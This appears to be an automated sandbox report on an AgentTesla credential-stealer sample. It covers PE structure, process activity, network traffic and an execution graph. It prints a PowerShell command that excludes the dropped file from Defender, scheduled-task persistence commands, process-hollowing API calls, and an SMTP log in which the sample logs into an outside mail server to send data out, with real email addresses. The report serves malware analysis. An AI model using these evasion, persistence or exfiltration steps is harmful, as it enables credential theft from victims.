                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb1b700x4b.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x800.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0xb08000x3608
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xafbc40xafc00e9ca07bb2e2e57b63cecbaf2762ebfdfFalse0.9273037428876245data7.876501523545841IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xb20000x8000x8001717871d4213b08a5747ffe539d823e1False0.33447265625data3.4172960973451905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xb40000xc0x200c3b595daa9f1dedb03d3995f9f3ccf68False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0xb20900x380data0.4296875
                          RT_MANIFEST0xb24200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Apr 23, 2024 10:19:48.129008055 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:48.344245911 CEST5874970965.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:48.344329119 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:48.700604916 CEST5874970965.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:48.707277060 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:48.922532082 CEST5874970965.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:48.923542023 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:49.139166117 CEST5874970965.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:49.183999062 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:49.945338011 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:50.161073923 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:50.161299944 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:50.338242054 CEST49709587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:50.452187061 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:50.452433109 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:50.667149067 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:50.667454004 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:50.923896074 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:54.883424044 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:54.933583975 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:55.808036089 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:56.022960901 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.030271053 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.030833006 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:56.245582104 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.245841980 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:56.462100029 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.469531059 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:56.684170961 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.684262991 CEST49711587192.168.2.565.21.71.87
                          Apr 23, 2024 10:19:56.684662104 CEST5874971165.21.71.87192.168.2.5
                          Apr 23, 2024 10:19:56.684708118 CEST49711587192.168.2.565.21.71.87

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Apr 23, 2024 10:19:47.672755957 CEST6340153192.168.2.51.1.1.1
                          Apr 23, 2024 10:19:48.120584965 CEST53634011.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Apr 23, 2024 10:19:47.672755957 CEST192.168.2.51.1.1.10x5592Standard query (0)mail.sigmamotorspk.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Apr 23, 2024 10:19:48.120584965 CEST1.1.1.1192.168.2.50x5592No error (0)mail.sigmamotorspk.comsigmamotorspk.comCNAME (Canonical name)IN (0x0001)false
                          Apr 23, 2024 10:19:48.120584965 CEST1.1.1.1192.168.2.50x5592No error (0)sigmamotorspk.com65.21.71.87A (IP address)IN (0x0001)false

                          SMTP Packets

                          TimestampSource PortDest PortSource IPDest IPCommands
                          Apr 23, 2024 10:19:48.700604916 CEST5874970965.21.71.87192.168.2.5220-pcp6.mywebsitebox.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 13:19:47 +0500
                          220-We do not authorize the use of this system to transport unsolicited,
                          220 and/or bulk e-mail.
                          Apr 23, 2024 10:19:48.707277060 CEST49709587192.168.2.565.21.71.87EHLO 585948
                          Apr 23, 2024 10:19:48.922532082 CEST5874970965.21.71.87192.168.2.5250-pcp6.mywebsitebox.com Hello 585948 [89.187.171.132]
                          250-SIZE 52428800
                          250-8BITMIME
                          250-PIPELINING
                          250-PIPECONNECT
                          250-AUTH PLAIN LOGIN
                          250-STARTTLS
                          250 HELP
                          Apr 23, 2024 10:19:48.923542023 CEST49709587192.168.2.565.21.71.87AUTH login a2hpcm9Ac2lnbWFtb3RvcnNway5jb20=
                          Apr 23, 2024 10:19:49.139166117 CEST5874970965.21.71.87192.168.2.5334 UGFzc3dvcmQ6
                          Apr 23, 2024 10:19:50.452187061 CEST5874971165.21.71.87192.168.2.5220-pcp6.mywebsitebox.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 13:19:49 +0500
                          220-We do not authorize the use of this system to transport unsolicited,
                          220 and/or bulk e-mail.
                          Apr 23, 2024 10:19:50.452433109 CEST49711587192.168.2.565.21.71.87EHLO 585948
                          Apr 23, 2024 10:19:50.667149067 CEST5874971165.21.71.87192.168.2.5250-pcp6.mywebsitebox.com Hello 585948 [89.187.171.132]
                          250-SIZE 52428800
                          250-8BITMIME
                          250-PIPELINING
                          250-PIPECONNECT
                          250-AUTH PLAIN LOGIN
                          250-STARTTLS
                          250 HELP
                          Apr 23, 2024 10:19:50.667454004 CEST49711587192.168.2.565.21.71.87AUTH login a2hpcm9Ac2lnbWFtb3RvcnNway5jb20=
                          Apr 23, 2024 10:19:54.883424044 CEST5874971165.21.71.87192.168.2.5334 UGFzc3dvcmQ6
                          Apr 23, 2024 10:19:56.030271053 CEST5874971165.21.71.87192.168.2.5235 Authentication succeeded
                          Apr 23, 2024 10:19:56.030833006 CEST49711587192.168.2.565.21.71.87MAIL FROM:<khiro@sigmamotorspk.com>
                          Apr 23, 2024 10:19:56.245582104 CEST5874971165.21.71.87192.168.2.5250 OK
                          Apr 23, 2024 10:19:56.245841980 CEST49711587192.168.2.565.21.71.87RCPT TO:<maungth@b-mech.com.sg>
                          Apr 23, 2024 10:19:56.462100029 CEST5874971165.21.71.87192.168.2.5550 Outgoing mail from "khiro@sigmamotorspk.com" has been suspended.
                          Apr 23, 2024 10:19:56.684170961 CEST5874971165.21.71.87192.168.2.5421 pcp6.mywebsitebox.com lost input connection

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:10:19:38
                          Start date:23/04/2024
                          Path:C:\Users\user\Desktop\Swift_Copy.scr
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Swift_Copy.scr" /S
                          Imagebase:0xfd0000
                          File size:736'776 bytes
                          MD5 hash:A474CCDA551682DCB92EFE1402DD02CB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:10:19:43
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
                          Imagebase:0x9f0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:10:19:43
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
                          Imagebase:0x190000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0x5d0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          Imagebase:0xe40000
                          File size:736'776 bytes
                          MD5 hash:A474CCDA551682DCB92EFE1402DD02CB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 71%, ReversingLabs
                          • Detection: 45%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:9
                          Start time:10:19:45
                          Start date:23/04/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
                          Imagebase:0x190000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:12
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0xac0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:9.6%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:225
                            Total number of Limit Nodes:14
                            execution_graph 29163 ab11c30 29164 ab11dbb 29163->29164 29166 ab11c56 29163->29166 29166->29164 29167 ab1182c 29166->29167 29168 ab11eb0 PostMessageW 29167->29168 29169 ab11f1c 29168->29169 29169->29166 29170 766e0e0 29171 766e0e6 29170->29171 29172 766e0f1 29171->29172 29176 ab10578 29171->29176 29198 ab105de 29171->29198 29221 ab10568 29171->29221 29177 ab10592 29176->29177 29178 ab1059a 29177->29178 29243 ab10d7b 29177->29243 29248 ab10f9b 29177->29248 29253 ab109d9 29177->29253 29258 ab10bd4 29177->29258 29263 ab11274 29177->29263 29268 ab10f13 29177->29268 29273 ab10d0b 29177->29273 29278 ab10b6b 29177->29278 29283 ab10d69 29177->29283 29288 ab10b29 29177->29288 29293 ab10ce7 29177->29293 29298 ab11084 29177->29298 29303 ab10b04 29177->29303 29308 ab11383 29177->29308 29312 ab10da0 29177->29312 29317 ab109a0 29177->29317 29322 ab1111e 29177->29322 29327 ab110dd 29177->29327 29331 ab10c7b 29177->29331 29178->29172 29199 ab1056c 29198->29199 29201 ab105e1 29198->29201 29200 ab1059a 29199->29200 29202 ab10f13 2 API calls 29199->29202 29203 ab11274 2 API calls 29199->29203 29204 ab10bd4 2 API calls 29199->29204 29205 ab109d9 2 API calls 29199->29205 29206 ab10f9b 2 API calls 29199->29206 29207 ab10d7b 2 API calls 29199->29207 29208 ab10c7b 2 API calls 29199->29208 29209 ab110dd 2 API calls 29199->29209 29210 ab1111e 2 API calls 29199->29210 29211 ab109a0 2 API calls 29199->29211 29212 ab10da0 2 API calls 29199->29212 29213 ab11383 2 API calls 29199->29213 29214 ab10b04 2 API calls 29199->29214 29215 ab11084 2 API calls 29199->29215 29216 ab10ce7 2 API calls 29199->29216 29217 ab10b29 2 API calls 29199->29217 29218 ab10d69 2 API calls 29199->29218 29219 ab10b6b 2 API calls 29199->29219 29220 ab10d0b 2 API calls 29199->29220 29200->29172 29201->29172 29202->29200 29203->29200 29204->29200 29205->29200 29206->29200 29207->29200 29208->29200 29209->29200 29210->29200 29211->29200 29212->29200 29213->29200 29214->29200 29215->29200 29216->29200 29217->29200 29218->29200 29219->29200 29220->29200 29222 ab1056c 29221->29222 29223 ab1059a 29222->29223 29224 ab10f13 2 API calls 29222->29224 29225 ab11274 2 API calls 29222->29225 29226 ab10bd4 2 API calls 29222->29226 29227 ab109d9 2 API calls 29222->29227 29228 ab10f9b 2 API calls 29222->29228 29229 ab10d7b 2 API calls 29222->29229 29230 ab10c7b 2 API calls 29222->29230 29231 ab110dd 2 API calls 29222->29231 29232 ab1111e 2 API calls 29222->29232 29233 ab109a0 2 API calls 29222->29233 29234 ab10da0 2 API calls 29222->29234 29235 ab11383 2 API calls 29222->29235 29236 ab10b04 2 API calls 29222->29236 29237 ab11084 2 API calls 29222->29237 29238 ab10ce7 2 API calls 29222->29238 29239 ab10b29 2 API calls 29222->29239 29240 ab10d69 2 API calls 29222->29240 29241 ab10b6b 2 API calls 29222->29241 29242 ab10d0b 2 API calls 29222->29242 29223->29172 29224->29223 29225->29223 29226->29223 29227->29223 29228->29223 29229->29223 29230->29223 29231->29223 29232->29223 29233->29223 29234->29223 29235->29223 29236->29223 29237->29223 29238->29223 29239->29223 29240->29223 29241->29223 29242->29223 29244 ab10db7 29243->29244 29245 ab10dd8 29244->29245 29336 766d370 29244->29336 29340 766d36b 29244->29340 29249 ab10b10 29248->29249 29250 ab1148e 29249->29250 29344 766d2b0 29249->29344 29348 766d2ab 29249->29348 29254 ab109c0 29253->29254 29352 766da24 29254->29352 29356 766da30 29254->29356 29259 ab10bee 29258->29259 29360 766ccf0 29259->29360 29364 766cce8 29259->29364 29260 ab11308 29265 ab10b28 29263->29265 29264 ab1119d 29264->29178 29265->29263 29265->29264 29368 766cda0 29265->29368 29372 766cd98 29265->29372 29269 ab10f1c 29268->29269 29271 766d370 WriteProcessMemory 29269->29271 29272 766d36b WriteProcessMemory 29269->29272 29270 ab11035 29271->29270 29272->29270 29274 ab10b10 29273->29274 29275 ab114c1 29274->29275 29276 766d2b0 VirtualAllocEx 29274->29276 29277 766d2ab VirtualAllocEx 29274->29277 29276->29274 29277->29274 29279 ab10b28 29278->29279 29280 ab1119d 29279->29280 29281 766cda0 Wow64SetThreadContext 29279->29281 29282 766cd98 Wow64SetThreadContext 29279->29282 29280->29178 29281->29279 29282->29279 29284 ab111a3 29283->29284 29286 766d370 WriteProcessMemory 29284->29286 29287 766d36b WriteProcessMemory 29284->29287 29285 ab112bd 29286->29285 29287->29285 29291 766cda0 Wow64SetThreadContext 29288->29291 29292 766cd98 Wow64SetThreadContext 29288->29292 29289 ab10b28 29289->29288 29290 ab1119d 29289->29290 29290->29178 29291->29289 29292->29289 29294 ab10bd3 29293->29294 29296 766ccf0 ResumeThread 29294->29296 29297 766cce8 ResumeThread 29294->29297 29295 ab11308 29296->29295 29297->29295 29300 ab10b10 29298->29300 29299 ab114c1 29300->29299 29301 766d2b0 VirtualAllocEx 29300->29301 29302 766d2ab VirtualAllocEx 29300->29302 29301->29300 29302->29300 29304 ab10b10 29303->29304 29305 ab114c1 29304->29305 29306 766d2b0 VirtualAllocEx 29304->29306 29307 766d2ab VirtualAllocEx 29304->29307 29305->29305 29306->29304 29307->29304 29376 ab11799 29308->29376 29381 ab117a8 29308->29381 29309 ab1139b 29313 ab10da6 29312->29313 29315 766d370 WriteProcessMemory 29313->29315 29316 766d36b WriteProcessMemory 29313->29316 29314 ab10dd8 29315->29314 29316->29314 29318 ab109bf 29317->29318 29320 766da24 CreateProcessA 29318->29320 29321 766da30 CreateProcessA 29318->29321 29319 ab10ae5 29319->29178 29320->29319 29321->29319 29324 ab10b10 29322->29324 29323 ab1114f 29324->29323 29325 766d2b0 VirtualAllocEx 29324->29325 29326 766d2ab VirtualAllocEx 29324->29326 29325->29324 29326->29324 29386 766d890 29327->29386 29390 766d898 29327->29390 29328 ab110ff 29332 ab10c88 29331->29332 29334 766ccf0 ResumeThread 29332->29334 29335 766cce8 ResumeThread 29332->29335 29333 ab11308 29334->29333 29335->29333 29337 766d3b8 WriteProcessMemory 29336->29337 29339 766d40f 29337->29339 29339->29245 29341 766d370 WriteProcessMemory 29340->29341 29343 766d40f 29341->29343 29343->29245 29345 766d2f0 VirtualAllocEx 29344->29345 29347 766d32d 29345->29347 29347->29249 29349 766d2b0 VirtualAllocEx 29348->29349 29351 766d32d 29349->29351 29351->29249 29353 766dab9 CreateProcessA 29352->29353 29355 766dc7b 29353->29355 29357 766dab9 CreateProcessA 29356->29357 29359 766dc7b 29357->29359 29361 766cd30 ResumeThread 29360->29361 29363 766cd61 29361->29363 29363->29260 29365 766ccf0 ResumeThread 29364->29365 29367 766cd61 29365->29367 29367->29260 29369 766cde5 Wow64SetThreadContext 29368->29369 29371 766ce2d 29369->29371 29371->29265 29373 766cda0 Wow64SetThreadContext 29372->29373 29375 766ce2d 29373->29375 29375->29265 29377 ab117a8 29376->29377 29379 766cda0 Wow64SetThreadContext 29377->29379 29380 766cd98 Wow64SetThreadContext 29377->29380 29378 ab117d3 29378->29309 29379->29378 29380->29378 29382 ab117bd 29381->29382 29384 766cda0 Wow64SetThreadContext 29382->29384 29385 766cd98 Wow64SetThreadContext 29382->29385 29383 ab117d3 29383->29309 29384->29383 29385->29383 29387 766d898 ReadProcessMemory 29386->29387 29389 766d927 29387->29389 29389->29328 29391 766d8e3 ReadProcessMemory 29390->29391 29393 766d927 29391->29393 29393->29328 29394 18e4808 29395 18e4811 29394->29395 29396 18e4817 29395->29396 29398 18e4d09 29395->29398 29399 18e4d2d 29398->29399 29403 18e4e18 29399->29403 29407 18e4e07 29399->29407 29400 18e4d37 29400->29396 29405 18e4e3f 29403->29405 29404 18e4f1c 29404->29404 29405->29404 29411 18e49f0 29405->29411 29409 18e4e0b 29407->29409 29408 18e4da3 29408->29400 29408->29408 29409->29408 29410 18e49f0 CreateActCtxA 29409->29410 29410->29408 29412 18e5ea8 CreateActCtxA 29411->29412 29414 18e5f6b 29412->29414 29415 18ed3c0 29416 18ed406 29415->29416 29420 18ed998 29416->29420 29423 18ed9a8 29416->29423 29417 18ed4f3 29426 18ed5fc 29420->29426 29424 18ed9d6 29423->29424 29425 18ed5fc DuplicateHandle 29423->29425 29424->29417 29425->29424 29427 18eda10 DuplicateHandle 29426->29427 29428 18ed9d6 29427->29428 29428->29417 29429 18eb030 29430 18eb03f 29429->29430 29432 18eb117 29429->29432 29433 18eb139 29432->29433 29434 18eb15c 29432->29434 29433->29434 29440 18eb3c0 29433->29440 29444 18eb3b1 29433->29444 29434->29430 29435 18eb154 29435->29434 29436 18eb360 GetModuleHandleW 29435->29436 29437 18eb38d 29436->29437 29437->29430 29441 18eb3d4 29440->29441 29442 18eb3f9 29441->29442 29448 18ea4b0 29441->29448 29442->29435 29445 18eb3ba 29444->29445 29446 18ea4b0 LoadLibraryExW 29445->29446 29447 18eb3f9 29445->29447 29446->29447 29447->29435 29449 18eb5a0 LoadLibraryExW 29448->29449 29451 18eb619 29449->29451 29451->29442

                            Executed Functions

                            Function 0AB12BE0 Relevance: .3, Instructions: 336COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 777eeb13a7ce636aef82c74a5301f6e581f2e80baaeeca760e9d9904835fc952
                            • Instruction ID: 3b6ce4203a834282b6e3fdac2d8785434f565aaa4d2b21789fd1ff2e070fbb6b
                            • Opcode Fuzzy Hash: 777eeb13a7ce636aef82c74a5301f6e581f2e80baaeeca760e9d9904835fc952
                            • Instruction Fuzzy Hash: 63C19A717016058FDB29DB79C490BAE77FAAF8A700F9448BDD146CB290DB34E902CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0AB10CB4 Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
